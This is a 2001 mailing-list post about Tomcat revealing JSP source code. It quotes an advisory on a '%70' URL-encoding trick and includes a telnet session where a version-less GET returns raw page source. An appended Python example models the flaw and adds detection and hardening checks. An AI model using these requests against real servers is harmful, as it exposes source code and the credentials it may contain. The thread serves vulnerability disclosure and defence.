From: Eric Daniel Mauricio (ericmauBESTWAY.COM.BR)
Date: Tue Apr 03 2001 - 15:47:23 CDT


    There is another way to get the source from a jsp page using Tomcat.

    If you don't write HTTP/1.0 or HTTP/1.1 at the end of the GET request,
    you will get the source code and not the processed jsp.

    In other words, use Apache + Tomcat if you intend to protect your source code.

    telnet maq106 8080
    Trying 10.0.0.106...
    Connected to maq106
    Escape character is '^]'.
    GET /examples/jsp/num/numguess.jsp
    HTTP/1.0 200 OK
    Content-Type: text/plain
    Content-Length: 1237
    Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
    Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
    Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)

    <!--
      Copyright (c) 1999 The Apache Software Foundation. All rights
      reserved.

      Number Guess Game
      Written by Jason Hunter, CTO, K&A Software
      http://www.servlets.com
    -->

    <% page import = "num.NumberGuessBean" %>

    <jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/>
    <jsp:setProperty name="numguess" property="*"/>

    <html>
    <head><title>Number Guess</title></head>
    <body bgcolor="white">
    <font size=4>

    <% if (numguess.getSuccess()) { %>

      Congratulations! You got it.
      And after just <%= numguess.getNumGuesses() %> tries.<p>

      <% numguess.reset(); %>

      Care to <a href="numguess.jsp">try again</a>?

    <% } else if (numguess.getNumGuesses() == 0) { %>

      Welcome to the Number Guess game.<p>

      I'm thinking of a number between 1 and 100.<p>

      <form method=get>
      What's your guess? <input type=text name=guess>
      <input type=submit value="Submit">
      </form>

    <% } else { %>

      Good guess, but nope. Try <b><%= numguess.getHint() %></b>.

      You have made <%= numguess.getNumGuesses() %> guesses.<p>

      I'm thinking of a number between 1 and 100.<p>

      <form method=get>
      What's your guess? <input type=text name=guess>
      <input type=submit value="Submit">
      </form>

    <% } %>

    </font>
    </body>
    </html>
    Connection closed by foreign host.

    [],

       ericmau

    "Sverre H. Huseby" <shhTHATHOST.COM> wrote:

    > Tomcat may reveal script source code by URL trickery
    > ----------------------------------------------------
    >
    > Sverre H. Huseby advisory 2001-03-29
    >
    >
    >
    > Systems affected
    > ----------------
    >
    > Tomcat 4.0-b1 (latest milestone) and nightly build as of 2001-03-28
    > tested. Other versions may be vulnerable too. The problem is only
    > present when using Tomcat's built-in web server, not when using Tomcat
    > with Apache Web Server.
    >
    >
    > Description
    > -----------
    >
    > Tomcat (http://jakarta.apache.org/tomcat/), the Reference
    > Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
    > Technologies, may be tricked into revealing the source code of JSP
    > scripts by using simple URL encoding.
    >
    >
    > Details
    > -------
    >
    > It seems that the built-in web server in Tomcat does URL decoding in
    > an unreasonable order. URLs like the following
    >
    > http://XXX:8080/examples/jsp/num/numguess.js%70
    >
    > where %70 is a URL-encoded 'p', returns the source code of index.jsp
    > rather than running the script on the server side.
    >
    > To speculate: The JSP handler is skipped as this URL does not end in
    > ".jsp", but the static file handler is nevertheless able to map the
    > URL into a correct file name.
    >
    >
    > Impact
    > ------
    >
    > This design error makes it possible to fetch the source code of JSP
    > scripts. Such source code may contain database passwords and file
    > names, and may reveal design errors or programming bugs that make it
    > possible to further exploit the server or service.
    >
    >
    >
    > Reported by Sverre H. Huseby, shhthathost.com
    >
    > --
    > <URL:mailto:shhthathost.com>
    > <URL:http://shh.thathost.com/>
    >
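Modelled on the two disclosure paths in this thread (the version-less request line in the telnet session above and the %70 trick in the quoted advisory), here is an added Python example that is not part of the original mail or of Tomcat. It contrasts dispatching on the raw, still-encoded path with decoding first, rejects HTTP/0.9-style request lines, and gives a log-review check that flags percent-encoding which alters a file extension. The function names and the sample request lines are constructed for illustration.

```python
from urllib.parse import unquote

JSP, STATIC, REJECT = "jsp", "static", "reject"


def parse_request_line(line):
    """Split 'METHOD SP path [SP HTTP/x.y]'; version is None for an HTTP/0.9-style line."""
    parts = line.strip().split()
    if len(parts) == 2:
        return parts[0], parts[1], None
    if len(parts) == 3 and parts[2].startswith("HTTP/"):
        return parts[0], parts[1], parts[2]
    raise ValueError(f"malformed request line: {line!r}")


def select_handler_vulnerable(raw_path):
    # Hypothetical model of the flawed order the advisory speculates about:
    # dispatch on the encoded path; the static file handler decodes it later
    # when opening the file, so ".js%70" misses the JSP handler but maps to the file.
    return JSP if raw_path.endswith(".jsp") else STATIC


def select_handler_fixed(raw_path):
    # Decode exactly once, up front, so handler selection and file lookup
    # see the same canonical name.
    return JSP if unquote(raw_path).endswith(".jsp") else STATIC


def dispatch_fixed(line):
    """Hardened dispatch: refuse version-less (HTTP/0.9 style) requests, then decode first."""
    _method, raw_path, version = parse_request_line(line)
    if version is None:
        return REJECT
    return select_handler_fixed(raw_path)


def _extension(path):
    name = path.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1] if "." in name else ""


def encoding_changes_extension(raw_path):
    """Log-review check: True when percent-decoding changes the requested file extension."""
    return _extension(raw_path) != _extension(unquote(raw_path))


if __name__ == "__main__":
    # Constructed sample request lines, mirroring the cases discussed in the thread.
    for line in ("GET /examples/jsp/num/numguess.jsp HTTP/1.0",
                 "GET /examples/jsp/num/numguess.js%70 HTTP/1.0",
                 "GET /examples/jsp/num/numguess.jsp"):
        raw = parse_request_line(line)[1]
        print(f"{line!r}: vulnerable={select_handler_vulnerable(raw)} "
              f"fixed={dispatch_fixed(line)} flag={encoding_changes_extension(raw)}")
```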